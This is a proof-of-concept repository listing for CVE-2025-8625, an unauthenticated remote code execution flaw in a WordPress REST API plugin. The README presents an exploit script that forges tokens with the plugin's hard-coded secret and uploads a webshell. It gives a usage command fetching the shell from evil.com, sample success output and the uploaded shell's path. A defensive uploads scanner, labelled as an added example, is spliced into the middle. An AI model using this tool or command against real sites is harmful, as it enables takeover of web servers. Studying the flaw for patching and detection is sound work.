CVE-2025-8625 PoC — Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code E

Associated Vulnerability
Title: Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution (CVE-2025-8625)
Description: The Copypress Rest API plugin for WordPress is vulnerable to Remote Code Execution via copyreap_handle_image() Function in versions 1.1 to 1.2. The plugin falls back to a hard-coded JWT signing key when no secret is defined and does not restrict which file types can be fetched and saved as attachments. As a result, unauthenticated attackers can forge a valid token to gain elevated privileges and upload an arbitrary file (e.g. a PHP script) through the image handler, leading to remote code execution.
Readme
# CVE-2025-8625
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
# 🛡️ Copypress Rest API 1.1 - 1.2 RCE Exploit

## 📝 Description

The Copypress Rest API plugin for WordPress (versions 1.1 to 1.2) is vulnerable to **Remote Code Execution** via the `copyreap_handle_image()` function.  
The plugin uses a hard-coded JWT signing key when no secret is set and does not validate file types, allowing unauthenticated attackers to forge tokens and upload arbitrary files (such as PHP shells) through the image handler endpoint.

- **CVE:** CVE-2025-8625  
- **CVSS:** 9.8 (Critical)

---

## 🚀 Script Overview

**Script name:** `CVE-2025-8625.py`  
This Python script automates exploitation of the vulnerability, allowing you to generate a valid JWT, send a crafted request, and upload a malicious file (webshell) to the vulnerable WordPress site.

---

## ⚙️ Usage

```bash
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
```

- `-u` / `--url`: Target WordPress site URL
- `-shell` / `--shell`: Direct link to your webshell or malicious PHP file

**Example output:**
```
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
```

---

## 🏆 Features

- Generates a valid JWT using the plugin's hardcoded secret
- Bypasses authentication to upload arbitrary files
- Provides clear output for success/failure of exploitation
- Simple command-line interface

---

## 📂 Shell Upload Location

**Shell uploaded successfully! 🎉**  
Shell path example:

```
https://target.com/wp-content/uploads/2025/10/shell.php
```
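
For defenders checking whether a site was affected, the uploads path shown above is the place to look. The following is an added example, not part of the original README or the PoC script: it walks a WordPress uploads directory and flags files that carry a script extension or contain a PHP opening tag. The function name `scan_uploads` and the extension list are assumptions.

```python
import os
import sys

# Assumption: extensions a PHP-enabled web server may be configured to execute.
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php5", ".php7", ".pht"}


def scan_uploads(uploads_dir, head_bytes=4096):
    """Return sorted (relative_path, reason) findings under uploads_dir."""
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, uploads_dir).replace(os.sep, "/")
            # Look at every dotted component so "x.php.jpg" is flagged too.
            exts = {"." + part.lower() for part in name.split(".")[1:]}
            if exts & SCRIPT_EXTS:
                findings.append((rel, "script extension"))
                continue
            try:
                with open(path, "rb") as fh:
                    head = fh.read(head_bytes)
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            # A media file has no reason to contain a PHP opening tag.
            if b"<?php" in head.lower():
                findings.append((rel, "PHP tag in content"))
    return sorted(findings)


if __name__ == "__main__":
    # Usage: python scan_uploads.py /path/to/wp-content/uploads
    for rel, reason in scan_uploads(sys.argv[1]):
        print(f"{reason}: {rel}")
```

A finding is a lead for triage, not proof of compromise; compare file timestamps against the period the vulnerable plugin version was installed.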

---

## ⚠️ Disclaimer

This tool is for **educational and authorized penetration testing** purposes only.  
Usage against targets without explicit permission is illegal.

---

***By: Nxploited (Khaled Alenazi)***
File Snapshot

```
[4.0K] /data/pocs/48cd20fbf40e540570ec43376a45aaadb8d8f563
├── [2.6K] CVE-2025-8625.py
├── [1.5K] LICENSE
├── [1.9K] README.md
└── [ 17] requirements.txt

1 directory, 4 files
```